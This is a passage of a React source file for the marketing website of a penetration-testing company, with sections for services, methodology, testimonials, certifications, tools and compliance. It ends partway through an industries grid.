import { useState, useEffect, useRef } from "react";
import "@/App.css";
import { BrowserRouter, Routes, Route, useNavigate, useLocation } from "react-router-dom";
import { Toaster, toast } from "sonner";
import { Turnstile } from "@marsidev/react-turnstile";
import {
  Globe,
  Smartphone,
  Server,
  Monitor,
  Code2,
  ShieldCheck,
  Lock,
  Zap,
  CheckCircle2,
  ChevronRight,
  Menu,
  X,
  Send,
  ArrowRight,
  Target,
  Eye,
  FileCode,
  Activity,
  ClipboardCheck,
  Mail,
  AlertTriangle,
  Home,
  RefreshCw,
  ServerCrash,
  ShieldAlert,
  WifiOff,
  MessageSquare,
  Search,
  FileTerminal,
  ListChecks,
  Fingerprint,
  Flag,
  Star,
  Brain,
  Linkedin,
  Wallet,
  Cloud,
  Link,
  Cpu,
  ShoppingCart,
  Building2
} from "lucide-react";
import {
  Select,
  SelectContent,
  SelectItem,
  SelectTrigger,
  SelectValue,
} from "./components/ui/select";

// API URL - uses relative path for Vercel, or custom URL for other deployments
const EMAIL_API_URL = process.env.REACT_APP_EMAIL_API_URL || "/api/send-email";

// Custom Logo Component - Cyber Cube Design
const CyberentLogo = ({ width = 200, height = 50 }) => (
  <img src="/logo192dark.png" alt="Cyberent Logo" style={{ width, height, objectFit: 'contain' }} />
);


// Navigation Component
const Navigation = () => {
  const navigate = useNavigate();
  const [isScrolled, setIsScrolled] = useState(false);
  const [isMobileMenuOpen, setIsMobileMenuOpen] = useState(false);

  const handleGlobalNav = (sectionId) => {
    if (window.location.pathname !== "/") {
      navigate("/", { state: { scrollTo: sectionId } });
    } else {
      scrollToSection(sectionId);
    }
  };

  useEffect(() => {
    const handleScroll = () => {
      setIsScrolled(window.scrollY > 50);
    };
    window.addEventListener("scroll", handleScroll);
    return () => window.removeEventListener("scroll", handleScroll);
  }, []);

  const scrollToSection = (id) => {
    const element = document.getElementById(id);
    if (element) {
      element.scrollIntoView({ behavior: "smooth" });
    }
    setIsMobileMenuOpen(false);
  };

  return (
    <nav
      data-testid="main-navigation"
      className={`fixed top-0 left-0 right-0 z-50 transition-all duration-300 ${isScrolled ? "glass py-4" : "bg-transparent py-6"
        }`}
    >
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="flex items-center justify-between">
          {/* Logo */}
          <a
            href="#hero"
            onClick={(e) => {
              e.preventDefault();
              scrollToSection("hero");
            }}
            className="flex items-center z-50 py-1"
            data-testid="logo-link"
          >
            <CyberentLogo width={180} height={50} />
          </a>

          {/* Desktop Navigation */}
          <div className="hidden md:flex items-center gap-8">
            <button
              onClick={() => handleGlobalNav("services")}
              className="nav-link"
              data-testid="nav-services"
            >
              Services
            </button>
            <button
              onClick={() => handleGlobalNav("about")}
              className="nav-link"
              data-testid="nav-about"
            >
              About
            </button>
            <button
              onClick={() => navigate("/blog")}
              className="nav-link"
              data-testid="nav-blog"
            >
              Blog
            </button>
            <button
              onClick={() => handleGlobalNav("testimonials")}
              className="nav-link"
              data-testid="nav-testimonials"
            >
              Testimonials
            </button>
            <button
              onClick={() => handleGlobalNav("contact")}
              className="btn-cyber text-sm"
              data-testid="nav-contact-cta"
            >
              Get Started
            </button>
          </div>



          {/* Mobile Menu Button */}
          <button
            className="md:hidden text-white p-2"
            onClick={() => setIsMobileMenuOpen(!isMobileMenuOpen)}
            data-testid="mobile-menu-toggle"
          >
            {isMobileMenuOpen ? <X size={24} /> : <Menu size={24} />}
          </button>
        </div>

        {/* Mobile Menu */}
        {isMobileMenuOpen && (
          <div className="md:hidden mt-4 py-4 border-t border-white/10" data-testid="mobile-menu">
            <div className="flex flex-col gap-4">
              <button
                onClick={() => handleGlobalNav("services")}
                className="text-left text-slate-400 hover:text-white py-2"
              >
                Services
              </button>
              <button
                onClick={() => handleGlobalNav("about")}
                className="text-left text-slate-400 hover:text-white py-2"
              >
                About
              </button>
              <button
                onClick={() => navigate("/blog")}
                className="text-left text-slate-400 hover:text-white py-2"
              >
                Blog
              </button>
              <button
                onClick={() => handleGlobalNav("testimonials")}
                className="text-left text-slate-400 hover:text-white py-2"
              >
                Testimonials
              </button>
              <button
                onClick={() => handleGlobalNav("contact")}
                className="btn-cyber text-sm w-full mt-2"
              >
                Get Started
              </button>
            </div>
          </div>
        )}
      </div>
    </nav>
  );
};

// Hero Section
const HeroSection = () => {
  const [displayText, setDisplayText] = useState("");
  const fullText = "Exponential Security.";
  const typingRef = useRef(null);

  useEffect(() => {
    let index = 0;
    const interval = setInterval(() => {
      if (index <= fullText.length) {
        setDisplayText(fullText.slice(0, index));
        index++;
      } else {
        clearInterval(interval);
      }
    }, 80);
    return () => clearInterval(interval);
  }, []);

  const scrollToContact = () => {
    const element = document.getElementById("contact");
    if (element) {
      element.scrollIntoView({ behavior: "smooth" });
    }
  };

  return (
    <section
      id="hero"
      className="relative min-h-screen flex items-center grid-bg overflow-hidden"
      data-testid="hero-section"
    >
      {/* Background Orbs */}
      <div className="hero-orb hero-orb-green w-[500px] h-[500px] -top-20 -right-20 absolute" />
      <div className="hero-orb hero-orb-blue w-[400px] h-[400px] bottom-20 -left-20 absolute" />

      {/* Noise overlay */}
      <div className="noise-overlay" />

      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 pt-32 pb-20 relative z-10">
        <div className="grid lg:grid-cols-2 gap-12 lg:gap-20 items-center">
          {/* Left Content */}
          <div className="animate-fade-in-up">
            <div className="inline-flex items-center gap-2 px-4 py-2 bg-white/5 border border-white/10 mb-8">
              <div className="status-dot" />
              <span className="text-sm text-slate-400 font-mono">
                VAPT Services Active
              </span>
            </div>

            <h1 className="hero-title mb-6">
              <span className="text-white">Cyberent</span>
              <sup className="superscript">3</sup>
            </h1>

            <h2 className="text-2xl md:text-3xl lg:text-[#00FF94]xl font-bold text-white mb-2">
              {displayText}
              <span className="terminal-cursor" ref={typingRef} />
            </h2>
            <p className="text-xl md:text-2xl text-[#00FF94] font-semibold mb-8">
              Zero Compromise.
            </p>

            <p className="text-slate-400 text-lg leading-relaxed mb-10 max-w-xl">
              Elite vulnerability assessment and penetration testing services
              for enterprises that demand excellence. We find the breaches
              before they find you.
            </p>

            <div className="flex flex-wrap gap-4">
              <button
                onClick={scrollToContact}
                className="btn-cyber flex items-center gap-2"
                data-testid="hero-cta-primary"
              >
                Request Assessment
                <ArrowRight size={18} />
              </button>
              <button
                onClick={() =>
                  document
                    .getElementById("services")
                    ?.scrollIntoView({ behavior: "smooth" })
                }
                className="btn-outline flex items-center gap-2"
                data-testid="hero-cta-secondary"
              >
                View Services
                <ChevronRight size={18} />
              </button>
            </div>
          </div>

          {/* Right Content - Visual */}
          <div className="hidden lg:block animate-fade-in-up delay-300">
            <div className="relative">
              {/* Terminal Window */}
              <div className="glass p-6 relative overflow-hidden">
                <div className="flex items-center gap-2 mb-4">
                  <div className="w-3 h-3 rounded-full bg-red-500" />
                  <div className="w-3 h-3 rounded-full bg-yellow-500" />
                  <div className="w-3 h-3 rounded-full bg-green-500" />
                  <span className="text-xs text-slate-500 ml-2 font-mono">
                    cyberent_scan.sh
                  </span>
                </div>
                <div className="font-mono text-sm space-y-2">
                  <p className="text-slate-500">$ initiating security scan...</p>
                  <p className="text-[#00FF94]">[✓] Network perimeter analyzed</p>
                  <p className="text-[#00FF94]">[✓] Web application scanned</p>
                  <p className="text-[#00FF94]">[✓] API endpoints tested</p>
                  <p className="text-[#00FF94]">[✓] Mobile app reviewed</p>
                  <p className="text-yellow-500">[!] 23 vulnerabilities found</p>
                  <p className="text-slate-400">
                    $ generating report<span className="animate-pulse">_</span>
                  </p>
                </div>
              </div>

              {/* Floating stats */}
              <div className="absolute -top-4 -right-4 glass p-4 animate-float">
                <div className="flex items-center gap-3">
                  <ShieldCheck className="text-[#00FF94]" size={24} />
                  <div>
                    <p className="text-2xl font-bold">50+</p>
                    <p className="text-xs text-slate-500">Security Assessments</p>
                  </div>
                </div>
              </div>

              <div
                className="absolute -bottom-4 -left-4 glass p-4 animate-float"
                style={{ animationDelay: "1s" }}
              >
                <div className="flex items-center gap-3">
                  <Lock className="text-[#3B82F6]" size={24} />
                  <div>
                    <p className="text-2xl font-bold">15+</p>
                    <p className="text-xs text-slate-500">Enterprise Clients</p>
                  </div>
                </div>
              </div>

              <div
                className="absolute top-1/2 -right-12 glass p-4 animate-float hidden xl:block"
                style={{ animationDelay: "2s" }}
              >
                <div className="flex items-center gap-3">
                  <Star className="text-yellow-500" size={24} />
                  <div>
                    <p className="text-2xl font-bold">3+</p>
                    <p className="text-xs text-slate-500">Years Experience</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
  );
};

// Services data
const services = [
  {
    id: "web",
    title: "Web Application VAPT",
    description:
      "Comprehensive security assessment of web applications including OWASP Top 10, business logic flaws, and authentication bypass.",
    icon: Globe,
    features: ["OWASP Top 10", "Auth Testing", "Session Management"],
  },
  {
    id: "mobile",
    title: "Mobile Application VAPT",
    description:
      "In-depth security testing for iOS and Android applications, including data storage, network communication, and binary analysis.",
    icon: Smartphone,
    features: ["iOS & Android", "Binary Analysis", "API Security"],
  },
  {
    id: "network",
    title: "Infrastructure & Network VAPT",
    description:
      "Network penetration testing to identify vulnerabilities in servers, firewalls, routers, and cloud infrastructure.",
    icon: Server,
    features: ["Internal/External", "Cloud Security", "Firewall Testing"],
  },
  {
    id: "thick",
    title: "Thick Client VAPT",
    description:
      "Security assessment of desktop applications including memory analysis, DLL injection, and local storage security.",
    icon: Monitor,
    features: ["Memory Analysis", "DLL Security", "Storage Review"],
  },
  {
    id: "api",
    title: "API Security Testing",
    description:
      "Thorough testing of REST, GraphQL, and SOAP APIs for authentication, authorization, and data exposure vulnerabilities.",
    icon: Code2,
    features: ["REST & GraphQL", "OAuth Testing", "Rate Limiting"],
  },
  {
    id: "grc",
    title: "GRC Auditing",
    description:
      "Governance, Risk, and Compliance auditing to ensure your organization meets regulatory requirements and industry standards.",
    icon: ClipboardCheck,
    features: ["ISO 27001", "SOC 2", "GDPR/HIPAA"],
  },
  {
    id: "llm",
    title: "LLM Security Testing",
    description:
      "Advanced security assessments for Large Language Models, including prompt injection, data leakage, and adversarial attacks.",
    icon: Brain,
    features: ["Prompt Injection", "Data Leakage", "AI Governance"],
  },
];

// Services Section
const ServicesSection = () => {
  return (
    <section
      id="services"
      className="section-padding bg-[#0A0A0A] relative"
      data-testid="services-section"
    >
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        {/* Section Header */}
        <div className="mb-16 animate-fade-in-up">
          <div className="flex items-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
              Our Services
            </span>
          </div>
          <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-4">
            Comprehensive Security
            <br />
            <span className="text-slate-500">Assessment Services</span>
          </h2>
          <p className="text-slate-400 max-w-2xl text-lg">
            We specialize in identifying vulnerabilities across your entire
            digital ecosystem before malicious actors can exploit them.
          </p>
        </div>

        {/* Services Grid - Bento Style */}
        <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6">
          {services.map((service, index) => (
            <div
              key={service.id}
              className={`card-cyber p-8 animate-fade-in-up ${service.id === "web" || service.id === "llm" ? "lg:col-span-2" : ""
                }`}
              style={{ animationDelay: `${index * 100}ms` }}
              data-testid={`service-card-${service.id}`}
            >
              <div className="service-icon mb-6 transition-all duration-300">
                <service.icon className="w-6 h-6 text-[#00FF94]" />
              </div>
              <h3 className="text-xl font-bold mb-3">{service.title}</h3>
              <p className="text-slate-400 mb-6 leading-relaxed">
                {service.description}
              </p>
              <div className="flex flex-wrap gap-2">
                {service.features.map((feature) => (
                  <span
                    key={feature}
                    className="text-xs font-mono px-3 py-1 bg-white/5 border border-white/10 text-slate-400"
                  >
                    {feature}
                  </span>
                ))}
              </div>
            </div>
          ))}
        </div>
      </div>
    </section>
  );
};

// VAPT Phases Data
const vaptPhases = [
  {
    id: 1,
    title: "NDA & Scope Definition",
    description: "Establishing rules of engagement, confidentiality agreements, and defining the precise scope and objectives of the penetration test.",
    icon: Search,
  },
  {
    id: 2,
    title: "Asset Identification",
    description: "Reconnaissance phase to identify the target's digital footprint, subdomains, exposed assets, and potential attack vectors from an external perspective.",
    icon: Fingerprint,
  },
  {
    id: 3,
    title: "Security Testing",
    description: "Active scanning and manual probing to identify security misconfigurations, outdated software, and logic flaws in the target infrastructure.",
    icon: Activity,
  },
  {
    id: 4,
    title: "Exploitation & Validation",
    description: "Safe exploitation of discovered vulnerabilities to determine their real-world impact and potential for lateral movement or data exfiltration.",
    icon: Flag,
  },
  {
    id: 5,
    title: "Final Report Delivery",
    description: "Delivery of a comprehensive, actionable report containing proof-of-concepts, risk ratings, and step-by-step remediation guidance for developers.",
    icon: ListChecks,
  },
  {
    id: 6,
    title: "Retesting",
    description: "Verifying that the vulnerabilities identified during the assessment have been effectively remediated and no longer pose a risk.",
    icon: RefreshCw,
  },
];

// VAPT Phases Section
const VaptPhasesSection = () => {
  return (
    <section
      id="methodology"
      className="section-padding bg-[#050505] relative border-t border-white/5"
      data-testid="methodology-section"
    >
      <div className="absolute inset-0 grid-bg opacity-30" />
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10">
        <div className="mb-16 animate-fade-in-up">
          <div className="flex items-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
              Methodology
            </span>
          </div>
          <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-4">
            Phases of Testing
          </h2>
          <p className="text-slate-400 max-w-2xl text-lg">
            Our penetration testing methodology follows a rigorous, systematic approach to ensure complete coverage and zero false positives.
          </p>
        </div>

        <div className="relative">
          {/* Vertical line connecting phases */}
          <div className="hidden lg:block absolute left-[39px] top-8 bottom-8 w-[2px] bg-white/10" />

          <div className="space-y-12">
            {vaptPhases.map((phase, index) => (
              <div
                key={phase.id}
                className="relative flex flex-col lg:flex-row gap-8 animate-fade-in-up"
                style={{ animationDelay: `${index * 150}ms` }}
              >
                {/* Number & Icon Bubble */}
                <div className="flex-shrink-0 flex items-center gap-6">
                  <div className="w-20 h-20 rounded-full bg-[#0A0A0A] border-2 border-[#00FF94]/30 flex items-center justify-center relative z-10 shadow-[0_0_15px_rgba(0,255,148,0.15)] group hover:border-[#00FF94] transition-colors duration-300">
                    <span className="absolute -top-3 -right-3 w-8 h-8 rounded-full bg-[#00FF94] text-[#050505] flex items-center justify-center font-bold font-mono text-sm border-4 border-[#050505]">
                      {phase.id}
                    </span>
                    <phase.icon className="w-8 h-8 text-[#00FF94]" />
                  </div>
                </div>

                {/* Content Details */}
                <div className="flex-grow pt-2 lg:pt-4">
                  <div className="card-cyber p-6 md:p-8 ml-0 lg:ml-4 group-hover:bg-white/[0.03] transition-colors duration-300 bg-black/40 backdrop-blur-sm">
                    <h3 className="text-xl md:text-2xl font-bold mb-3 text-white">
                      {phase.title}
                    </h3>
                    <p className="text-slate-400 leading-relaxed text-sm md:text-base">
                      {phase.description}
                    </p>
                  </div>
                </div>
              </div>
            ))}
          </div>
        </div>
      </div>
    </section>
  );
};

// Mission Section
const MissionSection = () => {
  return (
    <section
      id="mission"
      className="section-padding bg-[#0A0A0A] relative border-t border-white/5 overflow-hidden"
      data-testid="mission-section"
    >
      <div className="absolute inset-0 grid-bg opacity-30" />
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10 text-center">
        <div className="animate-fade-in-up">
          <div className="flex items-center justify-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
              Our Mission
            </span>
            <div className="w-12 h-[2px] bg-[#00FF94]" />
          </div>
          <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-8">
            Securing the <span className="text-slate-500">Digital Frontier</span>
          </h2>
          <div className="max-w-3xl mx-auto">
            <p className="text-xl md:text-2xl text-slate-300 leading-relaxed mb-10 font-light">
              At Cyberent³, our mission is to empower organizations with elite, zero-compromise security intelligence. We believe that true protection comes from thinking like the adversary to stay three steps ahead.
            </p>
            <div className="grid md:grid-cols-3 gap-8 text-left">
              <div className="p-6 bg-white/5 border border-white/10 hover:border-[#00FF94]/50 transition-colors group">
                <div className="service-icon mb-4 group-hover:bg-[#00FF94]/20">
                  <Fingerprint className="w-5 h-5 text-[#00FF94]" />
                </div>
                <h3 className="text-[#00FF94] font-bold mb-2">Elite Intelligence</h3>
                <p className="text-sm text-slate-400">Deep manual testing that goes beyond automated scanning protocols.</p>
              </div>
              <div className="p-6 bg-white/5 border border-white/10 hover:border-[#00FF94]/50 transition-colors group">
                <div className="service-icon mb-4 group-hover:bg-[#00FF94]/20">
                  <ShieldCheck className="w-5 h-5 text-[#00FF94]" />
                </div>
                <h3 className="text-[#00FF94] font-bold mb-2">Zero Compromise</h3>
                <p className="text-sm text-slate-400">Unwavering commitment to identifying every critical vulnerability.</p>
              </div>
              <div className="p-6 bg-white/5 border border-white/10 hover:border-[#00FF94]/50 transition-colors group">
                <div className="service-icon mb-4 group-hover:bg-[#00FF94]/20">
                  <Zap className="w-5 h-5 text-[#00FF94]" />
                </div>
                <h3 className="text-[#00FF94] font-bold mb-2">Secure Future</h3>
                <p className="text-sm text-slate-400">Building lasting resilience in an ever-evolving global threat landscape.</p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
  );
};

// About/Features Section
const AboutSection = () => {
  const features = [
    {
      icon: Target,
      title: "Deep manual security testing",
      description:
        "Comprehensive methodology blending advanced automation with elite manual exploitation techniques.",
    },
    {
      icon: ShieldCheck,
      title: "Zero false-positive reporting",
      description:
        "Every vulnerability is verified and validated, ensuring actionable and accurate reporting.",
    },
    {
      icon: Lock,
      title: "Secure and confidential engagements",
      description:
        "Strict adherence to Non-Disclosure Agreements and highly secure data handling protocols.",
    },
    {
      icon: FileCode,
      title: "Compliance-ready deliverables",
      description:
        "Detailed reports designed to seamlessly support regulatory audits and industry compliance.",
    },
    {
      icon: Zap,
      title: "Rapid turnaround time",
      description:
        "Accelerated testing cycles and reporting frameworks to meet strict deployment deadlines without compromising quality.",
    },
  ];

  return (
    <section
      id="about"
      className="section-padding relative overflow-hidden"
      data-testid="about-section"
    >
      {/* Background */}
      <div className="absolute inset-0 grid-bg opacity-50" />

      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10">
        <div className="grid lg:grid-cols-2 gap-16 items-center">
          {/* Left - Content */}
          <div className="animate-fade-in-up">
            <div className="flex items-center gap-3 mb-4">
              <div className="w-12 h-[2px] bg-[#00FF94]" />
              <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
                Why Organizations Choose Cyberent
              </span>
            </div>
            <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-6">
              Exponential Protection
              <br />
              <span className="text-slate-500">for Modern Threats</span>
            </h2>
            <p className="text-slate-400 text-lg leading-relaxed mb-8">
              In a world where cyber threats evolve daily, your security needs a
              partner that stays three steps ahead. Our security researchers bring hands-on experience in offensive security engagements across modern applications and infrastructure.
            </p>

            {/* Stats */}
            <div className="grid grid-cols-3 gap-6 mb-8">
              <div>
                <p className="text-3xl font-bold text-[#00FF94]">3+</p>
                <p className="text-sm text-slate-500">Years Experience</p>
              </div>
              <div>
                <p className="text-3xl font-bold text-[#00FF94]">50+</p>
                <p className="text-sm text-slate-500">Security Assessments</p>
              </div>
              <div>
                <p className="text-3xl font-bold text-[#00FF94]">15+</p>
                <p className="text-sm text-slate-500">Clients</p>
              </div>
            </div>

            <button
              onClick={() =>
                document
                  .getElementById("contact")
                  ?.scrollIntoView({ behavior: "smooth" })
              }
              className="btn-cyber flex items-center gap-2"
              data-testid="about-cta"
            >
              Start Your Assessment
              <ArrowRight size={18} />
            </button>
          </div>

          {/* Right - Features */}
          <div className="space-y-4 animate-fade-in-up delay-200">
            {features.map((feature, index) => (
              <div
                key={feature.title}
                className="feature-item group"
                style={{ animationDelay: `${index * 100}ms` }}
              >
                <div className="service-icon flex-shrink-0 group-hover:bg-[#00FF94]/20 transition-colors duration-300">
                  <feature.icon className="w-5 h-5 text-[#00FF94]" />
                </div>
                <div>
                  <h4 className="font-semibold mb-1">{feature.title}</h4>
                  <p className="text-slate-400 text-sm">{feature.description}</p>
                </div>
              </div>
            ))}
          </div>
        </div>
      </div>
    </section>
  );
};

// Testimonials Data
const testimonials = [
  {
    id: 1,
    quote: "Cyberent³'s VAPT engagement was eye-opening. They uncovered deep business logic flaws that automated tools completely missed. Their elite team operates at a level I haven't seen in other security firms.",
    rating: 5,
    role: "Chief Information Security Officer (CISO)",
    company: "Financial Services Industry",
  },
  {
    id: 2,
    quote: "The detail in their final report and the actionable remediation guidance saved us weeks of triage. We achieved SOC 2 compliance much faster thanks to their comprehensive API and network security audits.",
    rating: 4,
    role: "VP of Engineering",
    company: "Healthcare Industry",
  },
  {
    id: 3,
    quote: "Working with Cyberent³ feels like having an extension of our own Red Team. Their zero false-positive guarantee is real, and the communication throughout testing was entirely encrypted and seamless.",
    rating: 5,
    role: "Director of Infrastructure",
    company: "Logistics Industry",
  },
];

// Certification Data
const certifications = [
  { name: "OSCP – Offensive Security Certified Professional", icon: "/OSCP.png" },
  { name: "CRTO – Certified Red Team Operator", icon: "/CRTO.png" },
  { name: "eCPPT – Certified Professional Penetration Tester", icon: "/ecppt.svg" },
  { name: "CompTIA PenTest+", icon: "/pentest+.png" },
  { name: "EC-Council - Certified Ethical Hacker (CEH)", icon: "/ceh.png" },
  { name: "ISO/IEC 27001 Information Security Associate™", icon: "/iso27k.png" },
];

// Security Tools Data
const securityTools = [
  { name: "Burp Suite Professional", icon: "/tools/burpsuite.png" },
  { name: "Nmap & Network Enumeration Tools", icon: "/tools/nmap.png" },
  { name: "Metasploit Framework", icon: "/tools/metasploit.webp" },
  { name: "Nessus Vulnerability Scanner", icon: "/tools/Nessus.png" },
  { name: "Maltego Intelligence Platform", icon: "/tools/maltego.png" },
  { name: "Wireshark Network Analysis", icon: "/tools/wireshark.png" },
];

// Certification Section Component
const CertificationSection = () => {
  return (
    <section className="py-12 bg-[#050505] border-t border-white/5">
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="flex flex-col items-center">
          <span className="text-xs font-mono text-[#00FF94] uppercase tracking-widest mb-8 opacity-70">
            Our team holds certifications including:
          </span>
          <div className="flex flex-wrap justify-center items-center gap-8 md:gap-16 opacity-60 hover:opacity-100 transition-opacity duration-500">
            {certifications.map((cert) => (
              <div key={cert.name} className="flex flex-col items-center group relative">
                <img
                  src={cert.icon}
                  alt={cert.name}
                  className="h-14 md:h-20 w-auto object-contain grayscale group-hover:grayscale-0 transition-all duration-300 transform group-hover:scale-110"
                />
                <div className="absolute top-full mt-4 left-1/2 -translate-x-1/2 w-max max-w-[320px] text-center pointer-events-none opacity-0 group-hover:opacity-100 transition-all duration-300 z-50">
                  {/* Tooltip Caret */}
                  <div className="w-0 h-0 border-l-[6px] border-l-transparent border-r-[6px] border-r-transparent border-b-[6px] border-b-[#00FF94]/50 mx-auto" />
                  {/* Tooltip Content */}
                  <div className="bg-black/90 backdrop-blur-md px-3 py-2 border border-[#00FF94]/30 shadow-[0_0_15px_rgba(0,255,148,0.2)] rounded-sm">
                    <span className="text-[11px] font-mono text-[#00FF94] leading-tight block">
                      {cert.name}
                    </span>
                  </div>
                </div>
              </div>
            ))}
          </div>
        </div>
      </div>
    </section>
  );
};

// Security Tools Expertise Section
const ToolsExpertiseSection = () => {
  return (
    <section className="py-20 bg-[#0A0A0A] border-t border-white/5 overflow-hidden">
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="flex flex-col items-center px-4 sm:px-6 lg:px-8 mb-16">
          <div className="flex items-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-widest text-center">
              Security tools expertise
            </span>
            <div className="w-12 h-[2px] bg-[#00FF94]" />
          </div>
          <h2 className="text-2xl md:text-3xl font-bold text-center">
            Security Testing Arsenal
          </h2>
        </div>

        {/* Marquee Container */}
        <div className="relative flex overflow-x-hidden w-full group">
          <div className="flex animate-marquee group-hover:[animation-play-state:paused] whitespace-nowrap">
            {[...securityTools, ...securityTools, ...securityTools].map((tool, idx) => (
              <div key={`${tool.name}-${idx}`} className="flex flex-col items-center gap-4 mx-8 md:mx-12 group/item">
                <div className="w-16 h-16 md:w-20 md:h-20 flex items-center justify-center p-3 bg-white/[0.02] border border-white/5 group-hover/item:border-[#00FF94]/30 group-hover/item:bg-[#00FF94]/5 transition-all duration-500 transform group-hover/item:-translate-y-2 rounded-lg">
                  <img
                    src={tool.icon}
                    alt={tool.name}
                    className="w-full h-full object-contain grayscale group-hover/item:grayscale-0 transition-all duration-300"
                  />
                </div>
                <span className="text-xs font-mono text-slate-500 uppercase tracking-widest group-hover/item:text-[#00FF94] transition-colors">
                  {tool.name}
                </span>
              </div>
            ))}
          </div>
          <div className="flex animate-marquee group-hover:[animation-play-state:paused] whitespace-nowrap" aria-hidden="true">
            {[...securityTools, ...securityTools, ...securityTools].map((tool, idx) => (
              <div key={`${tool.name}-${idx}-clone`} className="flex flex-col items-center gap-4 mx-8 md:mx-12 group/item">
                <div className="w-16 h-16 md:w-20 md:h-20 flex items-center justify-center p-3 bg-white/[0.02] border border-white/5 group-hover/item:border-[#00FF94]/30 group-hover/item:bg-[#00FF94]/5 transition-all duration-500 transform group-hover/item:-translate-y-2 rounded-lg">
                  <img
                    src={tool.icon}
                    alt={tool.name}
                    className="w-full h-full object-contain grayscale group-hover/item:grayscale-0 transition-all duration-300"
                  />
                </div>
                <span className="text-xs font-mono text-slate-500 uppercase tracking-widest group-hover/item:text-[#00FF94] transition-colors">
                  {tool.name}
                </span>
              </div>
            ))}
          </div>
        </div>
      </div>
    </section>
  );
};

// Compliance Support Section
const ComplianceSection = () => {
  const standards = [
    {
      name: "SOC 2",
      description: "Our penetration tests satisfy SOC 2 Type II requirements by validating the effectiveness of your security controls and data protection measures.",
      icon: ShieldCheck,
    },
    {
      name: "ISO 27001",
      description: "Demonstrate continuous improvement and robust risk management with our ISO 27001 compliant technical vulnerability assessments.",
      icon: Globe,
    },
    {
      name: "PCI DSS",
      description: "Meet stringent Payment Card Industry Data Security Standard requirements with deep-dive application and network penetration testing.",
      icon: Wallet,
    },
    {
      name: "HIPAA",
      description: "Ensure the confidentiality, integrity, and availability of protected health information (PHI) through rigorous security validation.",
      icon: Activity,
    },
  ];

  return (
    <section id="compliance" className="section-padding bg-[#050505] relative border-t border-white/5">
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="mb-16 animate-fade-in-up text-center">
          <div className="flex items-center justify-center gap-3 mb-4">
            <div className="w-12 h-[2px] bg-[#00FF94]" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-wider">
              Compliance Support
            </span>
            <div className="w-12 h-[2px] bg-[#00FF94]" />
          </div>
          <h2 className="text-3xl md:text-[#00FF94]xl lg:text-5xl font-bold mb-4">
            Meet Regulatory <span className="text-slate-500">Requirements</span>
          </h2>
          <p className="text-slate-400 max-w-2xl mx-auto text-lg leading-relaxed">
            Our specialized VAPT engagements deliver the exact technical reporting and remediation artifacts required by auditors to achieve and maintain industry compliance.
          </p>
        </div>

        <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-6">
          {standards.map((standard, index) => (
            <div
              key={standard.name}
              className="card-cyber p-6 animate-fade-in-up border border-white/5 bg-white/[0.01] hover:border-[#00FF94]/30 hover:bg-[#00FF94]/5 transition-all duration-300"
              style={{ animationDelay: `${index * 100}ms` }}
            >
              <div className="w-12 h-12 mb-6 flex items-center justify-center bg-white/5 rounded-full text-[#00FF94]">
                <standard.icon size={24} />
              </div>
              <h3 className="text-lg font-bold mb-3">{standard.name}</h3>
              <p className="text-slate-400 text-sm leading-relaxed">
                {standard.description}
              </p>
            </div>
          ))}
        </div>
      </div>
    </section>
  );
};

// Industries Section
const IndustriesSection = () => {
  const industries = [
    { name: "Fintech", icon: Wallet, desc: "Banking, Payments, Crypto" },
    { name: "SaaS", icon: Cloud, desc: "Enterprise Platforms" },
    { name: "Healthcare", icon: Activity, desc: "EHR & Medical Security" },
    { name: "Web 3", icon: Link, desc: "Blockchain & Smart Contracts" },
    { name: "AI Platforms", icon: Cpu, desc: "LLM & ML Infrastructure" },
    { name: "E-Commerce", icon: ShoppingCart, desc: "Retail & Gateways" },
  ];

  return (
    <section id="industries" className="section-padding bg-[#0A0A0A] relative overflow-hidden">
      <div className="absolute top-1/2 left-1/2 -translate-x-1/2 -translate-y-1/2 w-[800px] h-[800px] bg-[#00FF94]/10 rounded-full blur-[120px] pointer-events-none opacity-20" />

      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative">
        <div className="text-center mb-16">
          <div className="flex items-center justify-center gap-3 mb-4">
            <div className="w-12 h-[1px] bg-[#00FF94]/50" />
            <span className="text-sm font-mono text-[#00FF94] uppercase tracking-[0.3em]">
              Global Protection
            </span>
            <div className="w-12 h-[1px] bg-[#00FF94]/50" />
          </div>
          <h2 className="text-3xl md:text-5xl font-bold text-white mb-6 text-center">
            Industries We <span className="text-[#00FF94]">Secure</span>
          </h2>
          <p className="text-slate-400 max-w-2xl mx-auto text-sm md:text-base text-center">
            Providing specialized offensive security assessments for critical sectors globally, ensuring compliance and robust defense mechanisms.
          </p>
        </div>

        <div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-6 gap-4 md:gap-6">
